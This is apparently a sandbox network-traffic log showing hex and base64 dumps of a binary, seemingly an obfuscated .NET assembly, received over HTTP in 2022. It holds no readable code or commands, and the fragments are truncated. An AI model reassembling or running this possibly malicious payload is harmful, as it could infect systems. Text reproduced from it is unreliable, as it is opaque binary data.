                                                                        2022-08-08 10:54:13 UTC109INData Raw: 6f 38 70 41 41 41 43 65 38 34 41 41 41 51 66 43 57 6f 2b 6c 51 41 41 41 41 49 52 42 52 45 48 4b 46 6f 41 41 41 71 50 4b 51 41 41 41 6e 76 4f 41 41 41 45 62 34 4d 42 41 41 59 73 50 52 45 46 45 51 63 6f 57 67 41 41 43 6f 38 70 41 41 41 43 45 51 55 52 42 79 68 61 41 41 41 4b 6a 79 6b 41 41 41 4a 37 7a 67 41 41 42 42 38 4e 61 74 70 73 49 77 41 41 41 41 41 41 41 41 42 41 57 79 69 52 41 41 41 4b 75 58 33 4e 41 41 41 45 4b 32 77 52 42 52 45 48 4b 46 6f 41 41 41 71 50 4b 51 41 41 41 68 45 46 45 51 63 6f 57 67 41 41 43 6f 38 70 41 41 41 43 65 38 34 41 41 41 51 66 44 47 72 61 62 43 4d 41 41 41 41 41 41 41 41 41 51 46 73 6f 6b 51 41 41 43 72 6c 39 7a 51 41 41 42 43 73 76 45 51 55 52 42 79 68 61 41 41 41 4b 6a 79 6b 41 41 41 49 43 65 38 6f 41 41 41 51 52 42 52 45 48
                                                                        Data Ascii: o8pAAACe84AAAQfCWo+lQAAAAIRBREHKFoAAAqPKQAAAnvOAAAEb4MBAAYsPREFEQcoWgAACo8pAAACEQURByhaAAAKjykAAAJ7zgAABB8NatpsIwAAAAAAAABAWyiRAAAKuX3NAAAEK2wRBREHKFoAAAqPKQAAAhEFEQcoWgAACo8pAAACe84AAAQfDGrabCMAAAAAAAAAQFsokQAACrl9zQAABCsvEQURByhaAAAKjykAAAICe8oAAAQRBREH
                                                                        2022-08-08 10:54:13 UTC117INData Raw: 68 4d 50 45 77 73 34 7a 77 41 41 41 41 4a 37 33 41 41 41 42 42 45 4c 6d 68 4d 4e 41 6e 76 63 41 41 41 45 45 51 73 58 31 70 6f 54 44 41 4a 37 33 51 41 41 42 43 78 4f 45 51 59 52 44 42 51 6f 31 77 51 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 4a 77 41 41 41 6f 52 44 42 51 6f 76 67 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 6f 52 44 58 51 79 41 41 41 43 41 6e 76 5a 41 41 41 45 4b 48 55 41 41 41 59 54 43 69 74 48 45 51 59 52 44 42 51 6f 31 77 51 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 4a 77 41 41 41 6f 52 44 42 51 6f 76 67 49 41 42 68 61 4e 42 77 41 41 41 52 51 55 46 43 69 6a 41 41 41 4b 4b 46 6f 41 41 41 6f 52 44 58 51 79 41 41 41 43 46 43 68 31 41 41 41 47 45 77 6f 52
                                                                        Data Ascii: hMPEws4zwAAAAJ73AAABBELmhMNAnvcAAAEEQsX1poTDAJ73QAABCxOEQYRDBQo1wQABhaNBwAAARQUFCijAAAKKJwAAAoRDBQovgIABhaNBwAAARQUFCijAAAKKFoAAAoRDXQyAAACAnvZAAAEKHUAAAYTCitHEQYRDBQo1wQABhaNBwAAARQUFCijAAAKKJwAAAoRDBQovgIABhaNBwAAARQUFCijAAAKKFoAAAoRDXQyAAACFCh1AAAGEwoR
                                                                        2022-08-08 10:54:13 UTC125INData Raw: 78 38 52 45 77 55 41 45 51 55 57 2f 67 45 73 41 78 63 54 42 51 41 52 42 52 38 58 2f 67 45 73 41 69 73 46 4f 4f 6e 39 2f 2f 38 71 45 7a 41 46 41 41 55 43 41 41 44 59 41 41 41 52 41 6e 73 51 41 51 41 45 4c 51 73 6f 77 67 51 41 42 6e 4f 44 41 67 41 4b 65 6e 4e 2f 41 67 41 4b 44 42 59 4b 4f 4e 55 42 41 41 41 43 65 78 41 42 41 41 51 47 4b 42 45 42 41 41 6f 54 45 42 45 51 62 69 42 51 53 77 45 43 61 6b 44 48 41 51 41 41 41 6e 73 51 41 51 41 45 42 68 37 57 4b 49 73 43 41 41 6f 67 41 41 67 41 41 46 38 57 2f 67 45 57 2f 67 45 54 42 77 4a 37 45 41 45 41 42 41 59 66 43 74 59 6f 69 77 49 41 43 68 4d 4e 41 6e 73 51 41 51 41 45 42 68 38 4d 31 69 67 52 41 51 41 4b 45 77 34 43 65 78 41 42 41 41 51 47 48 78 44 57 4b 42 45 42 41 41 6f 54 42 51 4a 37 45 41 45 41 42 41 59 66
                                                                        Data Ascii: x8REwUAEQUW/gEsAxcTBQARBR8X/gEsAisFOOn9//8qEzAFAAUCAADYAAARAnsQAQAELQsowgQABnODAgAKenN/AgAKDBYKONUBAAACexABAAQGKBEBAAoTEBEQbiBQSwECakDHAQAAAnsQAQAEBh7WKIsCAAogAAgAAF8W/gEW/gETBwJ7EAEABAYfCtYoiwIAChMNAnsQAQAEBh8M1igRAQAKEw4CexABAAQGHxDWKBEBAAoTBQJ7EAEABAYf
                                                                        2022-08-08 10:54:13 UTC133INData Raw: 67 41 4b 48 77 38 4d 41 41 67 66 44 2f 34 42 4c 42 73 44 66 43 4d 42 41 41 51 6f 70 77 49 41 43 69 69 63 41 67 41 4b 42 68 38 34 62 36 59 43 41 41 6f 66 45 41 77 41 43 42 38 4d 2f 67 45 73 45 52 63 6f 6d 51 49 41 43 67 59 66 4c 47 2b 6d 41 67 41 4b 48 77 30 4d 41 41 67 66 43 2f 34 42 4c 42 49 66 49 43 69 5a 41 67 41 4b 42 68 38 6d 62 36 59 43 41 41 6f 66 44 41 77 41 43 42 33 2b 41 53 77 56 41 33 73 62 41 51 41 45 4b 4a 77 43 41 41 6f 47 48 77 78 76 70 67 49 41 43 68 34 4d 41 41 67 57 2f 67 45 73 41 68 63 4d 41 41 67 66 45 66 34 42 4c 41 49 72 42 54 68 4d 2f 76 2f 2f 42 69 6f 41 41 41 41 54 4d 41 51 41 6b 67 49 41 41 4f 51 41 41 42 45 57 45 77 67 34 68 41 49 41 41 41 41 52 43 42 38 53 2f 67 45 73 44 41 63 66 43 6b 42 38 41 41 41 41 48 78 4d 54 43 41 41 52
                                                                        Data Ascii: gAKHw8MAAgfD/4BLBsDfCMBAAQopwIACiicAgAKBh84b6YCAAofEAwACB8M/gEsERcomQIACgYfLG+mAgAKHw0MAAgfC/4BLBIfICiZAgAKBh8mb6YCAAofDAwACB3+ASwVA3sbAQAEKJwCAAoGHwxvpgIACh4MAAgW/gEsAhcMAAgfEf4BLAIrBThM/v//BioAAAATMAQAkgIAAOQAABEWEwg4hAIAAAARCB8S/gEsDAcfCkB8AAAAHxMTCAAR
                                                                        2022-08-08 10:54:13 UTC140INData Raw: 77 6b 6f 56 77 49 41 42 6d 39 73 41 67 41 4b 4a 68 34 54 42 51 41 52 42 52 37 2b 41 53 77 63 43 51 59 49 6a 79 73 41 41 41 45 6f 45 51 55 41 42 69 6a 44 41 67 41 4b 62 32 77 43 41 41 6f 6d 48 77 6b 54 42 51 41 52 42 52 76 2b 41 53 77 49 4f 49 34 41 41 41 41 63 45 77 55 41 45 51 55 61 2f 67 45 73 44 42 59 47 6a 72 63 58 32 68 4d 45 44 42 73 54 42 51 41 52 42 52 38 4a 2f 67 45 73 43 41 67 58 31 67 77 66 43 68 4d 46 41 42 45 46 46 2f 34 42 4c 41 4d 59 45 77 55 41 45 51 55 63 2f 67 45 73 48 41 67 59 58 52 62 2b 41 51 67 47 6a 72 63 58 32 76 34 42 46 76 34 42 58 77 67 57 2f 67 4a 66 4c 49 4d 64 45 77 55 41 45 51 55 59 2f 67 45 73 46 51 49 6f 6c 77 41 41 43 67 4e 76 6d 41 41 41 43 6d 38 69 41 51 41 4b 43 68 6b 54 42 51 41 52 42 52 6e 2b 41 53 77 4a 63 37 6b 41
                                                                        Data Ascii: wkoVwIABm9sAgAKJh4TBQARBR7+ASwcCQYIjysAAAEoEQUABijDAgAKb2wCAAomHwkTBQARBRv+ASwIOI4AAAAcEwUAEQUa/gEsDBYGjrcX2hMEDBsTBQARBR8J/gEsCAgX1gwfChMFABEFF/4BLAMYEwUAEQUc/gEsHAgYXRb+AQgGjrcX2v4BFv4BXwgW/gJfLIMdEwUAEQUY/gEsFQIolwAACgNvmAAACm8iAQAKChkTBQARBRn+ASwJc7kA
                                                                        2022-08-08 10:54:13 UTC148INData Raw: 52 4d 4e 41 42 45 4e 46 76 34 42 4c 41 4d 58 45 77 30 41 45 51 30 66 47 2f 34 42 4c 41 49 72 42 54 68 76 2f 50 2f 2f 41 67 4a 37 52 41 45 41 42 47 34 58 61 74 61 34 66 55 51 42 41 41 51 47 4b 68 4d 77 42 67 41 7a 41 51 41 41 2b 51 41 41 45 52 59 54 42 7a 67 66 41 51 41 41 41 42 45 48 47 76 34 42 4c 41 73 61 6a 53 73 41 41 41 45 54 42 68 73 54 42 77 41 52 42 78 66 2b 41 53 77 44 47 42 4d 48 41 42 45 48 48 66 34 42 4c 43 63 52 42 68 67 47 46 34 30 48 41 41 41 42 45 77 51 52 42 42 59 58 6a 44 38 41 41 41 47 69 45 51 51 55 4b 4b 30 41 41 41 6f 6f 33 51 49 41 43 70 77 65 45 77 63 41 45 51 63 62 2f 67 45 73 4a 42 45 47 46 67 59 58 6a 51 63 41 41 41 45 4d 43 42 59 5a 6a 44 38 41 41 41 47 69 43 42 51 6f 72 51 41 41 43 69 6a 64 41 67 41 4b 6e 42 77 54 42 77 41 52
                                                                        Data Ascii: RMNABENFv4BLAMXEw0AEQ0fG/4BLAIrBThv/P//AgJ7RAEABG4Xata4fUQBAAQGKhMwBgAzAQAA+QAAERYTBzgfAQAAABEHGv4BLAsajSsAAAETBhsTBwARBxf+ASwDGBMHABEHHf4BLCcRBhgGF40HAAABEwQRBBYXjD8AAAGiEQQUKK0AAAoo3QIACpweEwcAEQcb/gEsJBEGFgYXjQcAAAEMCBYZjD8AAAGiCBQorQAACijdAgAKnBwTBwAR
                                                                        2022-08-08 10:54:13 UTC156INData Raw: 77 34 52 44 6e 35 4d 41 51 41 45 45 51 38 6f 48 41 49 41 42 68 4d 4c 63 79 49 43 41 41 59 54 45 42 45 51 43 47 38 6f 41 67 41 47 45 52 41 52 44 43 67 75 42 51 41 47 4b 43 34 43 41 41 59 6f 36 77 49 41 43 6d 38 6b 41 67 41 47 45 52 41 52 43 79 67 75 42 51 41 47 4b 43 34 43 41 41 59 6f 36 77 49 41 43 6d 38 6d 41 67 41 47 45 52 41 44 62 79 6f 43 41 41 59 47 45 52 42 76 45 67 45 41 43 74 34 50 4a 53 67 33 41 41 41 4b 45 78 51 6f 4f 41 41 41 43 74 34 41 45 51 6f 58 31 68 4d 4b 45 51 6f 52 46 7a 35 31 2f 76 2f 2f 45 52 55 58 31 68 4d 56 45 52 55 52 46 6f 36 33 50 2b 76 39 2f 2f 38 47 4b 67 42 42 4e 41 41 41 41 41 41 41 41 46 4d 41 41 41 41 4c 41 41 41 41 58 67 41 41 41 42 49 41 41 41 41 61 41 41 41 42 41 41 41 41 41 4a 30 41 41 41 42 74 41 51 41 41 43 67 49 41
                                                                        Data Ascii: w4RDn5MAQAEEQ8oHAIABhMLcyICAAYTEBEQCG8oAgAGERARDCguBQAGKC4CAAYo6wIACm8kAgAGERARCyguBQAGKC4CAAYo6wIACm8mAgAGERADbyoCAAYGERBvEgEACt4PJSg3AAAKExQoOAAACt4AEQoX1hMKEQoRFz51/v//ERUX1hMVERURFo63P+v9//8GKgBBNAAAAAAAAFMAAAALAAAAXgAAABIAAAAaAAABAAAAAJ0AAABtAQAACgIA
                                                                        2022-08-08 10:54:13 UTC164INData Raw: 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 49 41 41 41 43 61 4a 53 30 53 4a 69 43 43 41 41 41 41 49 45 73 47 41 41 41 66 48 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 44 41 41 41 41 6d 69 55 74 45 53 59 67 67 77 41 41 41 43 42 70 42 67 41 41 48 43 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 43 45 41 41 41 41 6d 69 55 74 45 69 59 67 68 41 41 41 41 43 42 76 42 67 41 41 48 78 67 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 68 51 41 41 41 4a 6f 6c 4c 52 49 6d 49 49 55 41 41 41 41 67 68 77 59 41 41 42 38 4b 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 49 59 41 41 41 43 61 4a 53 30 53 4a 69 43 47 41 41 41 41 49 4a 45 47 41 41 41 66 4d 79 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 43 48 41 41 41 41 6d 69 55 74 45 53 59 67
                                                                        Data Ascii: C0CAAYqhn6ZAQAEIIIAAACaJS0SJiCCAAAAIEsGAAAfHigtAgAGKoJ+mQEABCCDAAAAmiUtESYggwAAACBpBgAAHCgtAgAGKoZ+mQEABCCEAAAAmiUtEiYghAAAACBvBgAAHxgoLQIABiqGfpkBAAQghQAAAJolLRImIIUAAAAghwYAAB8KKC0CAAYqhn6ZAQAEIIYAAACaJS0SJiCGAAAAIJEGAAAfMygtAgAGKoJ+mQEABCCHAAAAmiUtESYg
                                                                        2022-08-08 10:54:13 UTC172INData Raw: 41 45 41 41 43 42 7a 45 51 41 41 48 77 6f 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67 4e 51 45 41 41 4a 6f 6c 4c 52 49 6d 49 44 55 42 41 41 41 67 66 52 45 41 41 42 38 4f 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 44 59 42 41 41 43 61 4a 53 30 53 4a 69 41 32 41 51 41 41 49 49 73 52 41 41 41 66 44 69 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 41 33 41 51 41 41 6d 69 55 74 45 53 59 67 4e 77 45 41 41 43 43 5a 45 51 41 41 47 53 67 74 41 67 41 47 4b 6f 4a 2b 6d 51 45 41 42 43 41 34 41 51 41 41 6d 69 55 74 45 53 59 67 4f 41 45 41 41 43 43 63 45 51 41 41 47 53 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 41 35 41 51 41 41 6d 69 55 74 45 69 59 67 4f 51 45 41 41 43 43 66 45 51 41 41 48 77 77 6f 4c 51 49 41 42 69 71 47 66 70 6b 42 41 41 51 67
                                                                        Data Ascii: AEAACBzEQAAHwooLQIABiqGfpkBAAQgNQEAAJolLRImIDUBAAAgfREAAB8OKC0CAAYqhn6ZAQAEIDYBAACaJS0SJiA2AQAAIIsRAAAfDigtAgAGKoJ+mQEABCA3AQAAmiUtESYgNwEAACCZEQAAGSgtAgAGKoJ+mQEABCA4AQAAmiUtESYgOAEAACCcEQAAGSgtAgAGKoZ+mQEABCA5AQAAmiUtEiYgOQEAACCfEQAAHwwoLQIABiqGfpkBAAQg
                                                                        2022-08-08 10:54:13 UTC179INData Raw: 70 6b 42 41 41 51 67 35 77 45 41 41 4a 6f 6c 4c 52 49 6d 49 4f 63 42 41 41 41 67 75 78 73 41 41 42 38 4c 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4f 67 42 41 41 43 61 4a 53 30 52 4a 69 44 6f 41 51 41 41 49 4d 59 62 41 41 41 63 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4f 6b 42 41 41 43 61 4a 53 30 52 4a 69 44 70 41 51 41 41 49 4d 77 62 41 41 41 64 4b 43 30 43 41 41 59 71 68 6e 36 5a 41 51 41 45 49 4f 6f 42 41 41 43 61 4a 53 30 53 4a 69 44 71 41 51 41 41 49 4e 4d 62 41 41 41 66 43 69 67 74 41 67 41 47 4b 6f 5a 2b 6d 51 45 41 42 43 44 72 41 51 41 41 6d 69 55 74 45 69 59 67 36 77 45 41 41 43 44 64 47 77 41 41 48 77 73 6f 4c 51 49 41 42 69 71 43 66 70 6b 42 41 41 51 67 37 41 45 41 41 4a 6f 6c 4c 52 45 6d 49 4f 77 42 41 41 41 67 36 42 73 41
                                                                        Data Ascii: pkBAAQg5wEAAJolLRImIOcBAAAguxsAAB8LKC0CAAYqgn6ZAQAEIOgBAACaJS0RJiDoAQAAIMYbAAAcKC0CAAYqgn6ZAQAEIOkBAACaJS0RJiDpAQAAIMwbAAAdKC0CAAYqhn6ZAQAEIOoBAACaJS0SJiDqAQAAINMbAAAfCigtAgAGKoZ+mQEABCDrAQAAmiUtEiYg6wEAACDdGwAAHwsoLQIABiqCfpkBAAQg7AEAAJolLREmIOwBAAAg6BsA
                                                                        2022-08-08 10:54:13 UTC187INData Raw: 41 41 59 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 6f 43 41 41 43 61 4a 53 30 52 4a 69 43 61 41 67 41 41 49 4f 63 6d 41 41 41 58 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 73 43 41 41 43 61 4a 53 30 52 4a 69 43 62 41 67 41 41 49 4f 67 6d 41 41 41 59 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 77 43 41 41 43 61 4a 53 30 52 4a 69 43 63 41 67 41 41 49 4f 6f 6d 41 41 41 63 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 30 43 41 41 43 61 4a 53 30 52 4a 69 43 64 41 67 41 41 49 50 41 6d 41 41 41 58 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 34 43 41 41 43 61 4a 53 30 52 4a 69 43 65 41 67 41 41 49 50 45 6d 41 41 41 65 4b 43 30 43 41 41 59 71 67 6e 36 5a 41 51 41 45 49 4a 38 43 41 41 43 61 4a 53 30 52 4a 69 43 66
                                                                        Data Ascii: AAYKC0CAAYqgn6ZAQAEIJoCAACaJS0RJiCaAgAAIOcmAAAXKC0CAAYqgn6ZAQAEIJsCAACaJS0RJiCbAgAAIOgmAAAYKC0CAAYqgn6ZAQAEIJwCAACaJS0RJiCcAgAAIOomAAAcKC0CAAYqgn6ZAQAEIJ0CAACaJS0RJiCdAgAAIPAmAAAXKC0CAAYqgn6ZAQAEIJ4CAACaJS0RJiCeAgAAIPEmAAAeKC0CAAYqgn6ZAQAEIJ8CAACaJS0RJiCf
                                                                        2022-08-08 10:54:13 UTC195INData Raw: 47 4e 36 51 6e 77 50 48 41 30 62 50 79 59 38 54 54 45 57 45 67 63 33 4c 6a 52 46 4b 51 34 4b 48 79 49 71 44 78 67 41 55 7a 51 51 41 68 59 33 47 69 55 38 4a 79 63 4e 49 43 4d 36 4c 53 30 63 41 69 6b 6f 4d 79 6f 30 42 77 30 71 4f 79 31 38 47 54 4d 6e 4d 52 41 47 42 78 41 55 2f 75 72 30 36 73 48 64 79 65 76 32 38 2f 7a 53 7a 39 50 42 31 70 54 53 33 4d 48 32 39 50 6e 6b 37 66 44 6c 34 2b 54 79 2b 75 48 56 33 74 76 4d 33 4e 50 66 34 75 54 33 39 2b 44 30 34 74 6a 44 7a 73 76 50 2b 4f 7a 36 77 4e 37 64 77 64 58 58 77 73 66 49 78 6f 4f 66 6a 5a 71 79 70 34 4f 65 6c 71 75 72 70 4c 2b 34 70 37 43 6f 71 62 32 33 71 71 43 70 72 72 65 68 6f 35 36 51 67 34 4f 55 75 4b 36 4f 6e 5a 36 59 72 62 2b 6e 67 49 2b 54 67 34 47 51 6c 59 6d 79 72 4c 79 74 6a 37 4f 76 70 6f 61 6a
                                                                        Data Ascii: GN6QnwPHA0bPyY8TTEWEgc3LjRFKQ4KHyIqDxgAUzQQAhY3GiU8JycNICM6LS0cAikoMyo0Bw0qOy18GTMnMRAGBxAU/ur06sHdyev28/zSz9PB1pTS3MH29Pnk7fDl4+Ty+uHV3tvM3NPf4uT39+D04tjDzsvP+Oz6wN7dwdXXwsfIxoOfjZqyp4OelqurpL+4p7Coqb23qqCprreho56Qg4OUuK6OnZ6Yrb+ngI+Tg4GQlYmyrLytj7Ovpoaj
                                                                        2022-08-08 10:54:13 UTC203INData Raw: 4c 53 30 73 4c 43 73 72 4b 43 67 33 39 33 66 32 64 66 56 31 39 6e 66 33 64 2f 5a 70 36 57 6e 75 62 2b 39 76 37 6d 33 74 62 65 35 76 37 32 46 68 35 6d 66 6e 5a 2b 5a 6c 35 57 58 6d 5a 2b 64 6e 35 6d 48 68 59 65 35 76 37 32 2f 75 62 65 31 74 35 36 58 71 4b 54 6d 68 61 57 78 2b 34 65 5a 75 72 32 77 71 62 4f 6d 2f 5a 4f 58 6d 4b 32 75 72 79 6f 72 4b 48 31 47 53 6d 35 4d 56 6d 74 72 5a 48 39 34 5a 33 42 6f 61 58 31 33 61 6d 42 70 62 6e 64 68 62 47 4a 5a 55 55 42 43 61 33 6c 74 56 56 78 6d 59 55 78 77 64 33 4e 64 52 44 56 59 56 6e 39 76 62 48 42 77 65 47 39 5a 63 32 64 78 56 58 39 6c 55 6e 6f 47 44 77 30 62 51 41 4d 66 47 54 34 75 41 51 67 4b 42 51 73 64 56 42 49 57 45 44 38 63 48 78 49 48 48 51 51 69 4f 79 4d 6b 4a 69 38 35 50 69 77 38 41 69 30 6b 4c 67 49 6b
                                                                        Data Ascii: LS0sLCsrKCg393f2dfV19nf3d/Zp6Wnub+9v7m3tbe5v72Fh5mfnZ+Zl5WXmZ+dn5mHhYe5v72/ube1t56XqKTmhaWx+4eZur2wqbOm/ZOXmK2uryorKH1GSm5MVmtrZH94Z3BoaX13amBpbndhbGJZUUBCa3ltVVxmYUxwd3NdRDVYVn9vbHBweG9Zc2dxVX9lUnoGDw0bQAMfGT4uAQgKBQsdVBIWED8cHxIHHQQiOyMkJi85Piw8Ai0kLgIk
                                                                        2022-08-08 10:54:13 UTC211INData Raw: 4d 34 68 57 67 51 47 41 4f 73 41 72 52 6f 53 41 44 49 75 47 69 30 47 41 41 6b 41 4b 44 4d 47 41 4e 6f 41 4b 44 4d 61 41 45 45 71 52 79 34 61 41 48 63 64 52 79 34 61 41 4f 77 47 52 79 34 47 41 4a 38 41 58 41 63 47 41 4b 6f 59 4b 44 4d 47 41 45 49 6e 4a 78 30 47 41 48 38 69 72 52 6f 47 41 4e 73 68 4b 44 4d 47 41 41 51 42 4b 44 4d 53 41 4c 38 52 43 68 6b 47 41 4c 30 4c 72 52 6f 47 41 42 63 53 66 53 59 47 41 4a 63 53 66 53 59 47 41 42 6f 52 4e 79 59 41 41 41 41 41 50 51 45 41 41 41 41 41 41 51 41 42 41 41 41 41 41 41 43 58 41 5a 63 42 42 51 41 42 41 41 45 41 41 41 41 41 41 50 63 47 6c 77 45 56 41 41 45 41 41 67 41 41 41 52 41 41 78 41 47 58 41 52 30 41 41 51 41 44 41 41 55 42 41 41 43 58 41 51 41 41 48 51 41 46 41 41 67 41 42 51 45 41 41 41 34 41 41 41 41 64
                                                                        Data Ascii: M4hWgQGAOsArRoSADIuGi0GAAkAKDMGANoAKDMaAEEqRy4aAHcdRy4aAOwGRy4GAJ8AXAcGAKoYKDMGAEInJx0GAH8irRoGANshKDMGAAQBKDMSAL8RChkGAL0LrRoGABcSfSYGAJcSfSYGABoRNyYAAAAAPQEAAAAAAQABAAAAAACXAZcBBQABAAEAAAAAAPcGlwEVAAEAAgAAARAAxAGXAR0AAQADAAUBAACXAQAAHQAFAAgABQEAAA4AAAAd
                                                                        2022-08-08 10:54:13 UTC219INData Raw: 41 4d 41 52 67 4e 6c 43 32 55 51 4a 51 41 41 41 41 41 41 41 77 41 47 47 43 49 6c 38 51 49 6c 41 41 41 41 41 41 41 44 41 45 59 44 59 41 74 59 45 43 55 41 41 41 41 41 41 41 4d 41 52 67 4e 57 43 37 73 50 4a 51 41 41 41 41 41 41 41 77 42 47 41 32 55 4c 5a 52 41 6c 41 41 41 41 41 41 41 44 41 41 59 59 49 69 58 78 41 69 55 41 41 41 41 41 41 41 4d 41 52 67 4e 67 43 32 77 51 4a 51 41 41 41 41 41 41 41 77 42 47 41 31 59 4c 65 52 41 6c 41 41 41 41 41 41 41 44 41 45 59 44 5a 51 73 6d 45 43 55 41 59 35 6f 41 41 41 41 41 45 52 67 6f 4a 59 59 41 4a 51 43 30 49 67 41 41 41 41 41 47 47 43 49 6c 45 77 41 6c 41 49 43 61 41 41 41 41 41 42 4d 41 6c 77 47 51 45 43 55 41 52 4a 73 41 41 41 41 41 45 51 44 33 42 6f 59 41 4a 51 44 73 6e 67 41 41 41 41 41 52 41 4d 51 42 6b 42 41 6c
                                                                        Data Ascii: AMARgNlC2UQJQAAAAAAAwAGGCIl8QIlAAAAAAADAEYDYAtYECUAAAAAAAMARgNWC7sPJQAAAAAAAwBGA2ULZRAlAAAAAAADAAYYIiXxAiUAAAAAAAMARgNgC2wQJQAAAAAAAwBGA1YLeRAlAAAAAAADAEYDZQsmECUAY5oAAAAAERgoJYYAJQC0IgAAAAAGGCIlEwAlAICaAAAAABMAlwGQECUARJsAAAAAEQD3BoYAJQDsngAAAAARAMQBkBAl
                                                                        2022-08-08 10:54:13 UTC226INData Raw: 6e 30 41 6d 76 38 42 41 41 41 41 6c 67 42 61 49 65 59 43 66 51 43 32 2f 77 45 41 41 41 43 57 41 50 55 45 35 67 4a 39 41 4e 48 2f 41 51 41 41 41 4a 59 41 65 69 58 6d 41 6e 30 41 37 66 38 42 41 41 41 41 6c 67 41 6d 42 65 59 43 66 51 41 49 41 41 49 41 41 41 43 57 41 4c 55 72 35 67 4a 39 41 43 4d 41 41 67 41 41 41 4a 59 41 55 41 58 6d 41 6e 30 41 50 67 41 43 41 41 41 41 6c 67 43 37 4d 4f 59 43 66 51 42 5a 41 41 49 41 41 41 43 57 41 48 6f 46 35 67 4a 39 41 48 51 41 41 67 41 41 41 4a 59 41 35 54 44 6d 41 6e 30 41 6a 77 41 43 41 41 41 41 6c 67 43 79 42 65 59 43 66 51 43 71 41 41 49 41 41 41 43 57 41 41 38 78 35 67 4a 39 41 4d 55 41 41 67 41 41 41 4a 59 41 37 51 58 6d 41 6e 30 41 34 41 41 43 41 41 41 41 6c 67 42 31 4d 65 59 43 66 51 44 38 41 41 49 41 41 41 43 57
                                                                        Data Ascii: n0Amv8BAAAAlgBaIeYCfQC2/wEAAACWAPUE5gJ9ANH/AQAAAJYAeiXmAn0A7f8BAAAAlgAmBeYCfQAIAAIAAACWALUr5gJ9ACMAAgAAAJYAUAXmAn0APgACAAAAlgC7MOYCfQBZAAIAAACWAHoF5gJ9AHQAAgAAAJYA5TDmAn0AjwACAAAAlgCyBeYCfQCqAAIAAACWAA8x5gJ9AMUAAgAAAJYA7QXmAn0A4AACAAAAlgB1MeYCfQD8AAIAAACW
                                                                        2022-08-08 10:54:13 UTC234INData Raw: 4a 59 41 47 6a 48 6d 41 6e 30 41 70 7a 55 43 41 41 41 41 6c 67 44 34 42 65 59 43 66 51 44 49 4e 51 49 41 41 41 43 57 41 4f 34 78 35 67 4a 39 41 4f 6b 31 41 67 41 41 41 4a 59 41 49 67 62 6d 41 6e 30 41 43 6a 59 43 41 41 41 41 6c 67 41 32 4d 75 59 43 66 51 41 72 4e 67 49 41 41 41 43 57 41 45 77 47 35 67 4a 39 41 45 30 32 41 67 41 41 41 4a 59 41 30 6a 54 6d 41 6e 30 41 62 6a 59 43 41 41 41 41 6c 67 42 33 41 65 59 43 66 51 43 51 4e 67 49 41 41 41 43 57 41 4b 59 47 35 67 4a 39 41 4c 49 32 41 67 41 41 41 4a 59 41 75 67 48 6d 41 6e 30 41 31 44 59 43 41 41 41 41 6c 67 41 61 42 2b 59 43 66 51 44 32 4e 67 49 41 41 41 43 57 41 4f 77 42 35 67 4a 39 41 42 67 33 41 67 41 41 41 4a 59 41 55 41 66 6d 41 6e 30 41 4f 6a 63 43 41 41 41 41 6c 67 42 65 41 75 59 43 66 51 42 63
                                                                        Data Ascii: JYAGjHmAn0ApzUCAAAAlgD4BeYCfQDINQIAAACWAO4x5gJ9AOk1AgAAAJYAIgbmAn0ACjYCAAAAlgA2MuYCfQArNgIAAACWAEwG5gJ9AE02AgAAAJYA0jTmAn0AbjYCAAAAlgB3AeYCfQCQNgIAAACWAKYG5gJ9ALI2AgAAAJYAugHmAn0A1DYCAAAAlgAaB+YCfQD2NgIAAACWAOwB5gJ9ABg3AgAAAJYAUAfmAn0AOjcCAAAAlgBeAuYCfQBc
                                                                        2022-08-08 10:54:13 UTC242INData Raw: 44 6b 43 31 78 63 74 42 4a 45 42 71 51 73 79 42 45 45 43 69 51 6b 33 42 47 45 42 65 52 55 39 42 4d 6b 41 68 53 70 59 42 4d 6b 41 61 41 31 4a 41 63 6b 41 78 51 63 75 41 63 6b 41 71 41 31 64 42 45 6b 43 52 51 4a 77 42 46 6b 43 4d 67 6c 77 42 46 45 43 43 54 52 32 42 45 6b 43 79 53 6d 41 42 47 45 43 7a 53 32 56 42 47 6b 43 57 6a 4b 78 42 4a 45 42 45 52 57 32 42 47 6b 43 49 69 57 38 42 4b 6b 41 45 67 72 43 42 48 45 43 4f 7a 48 49 42 48 45 43 65 52 58 4f 42 4b 6b 41 7a 43 76 54 42 4b 6b 41 7a 43 76 5a 42 4b 6b 42 5a 42 41 54 41 43 6b 41 4f 52 73 6b 42 62 6b 43 73 79 55 71 42 61 6b 43 5a 68 59 75 41 61 6b 43 6f 43 30 75 41 61 45 43 49 69 55 77 42 5a 6b 43 49 69 55 77 42 5a 45 43 49 69 57 59 41 34 45 43 41 54 51 32 42 56 6b 43 6c 52 51 37 42 59 6b 43 49 69 56 42
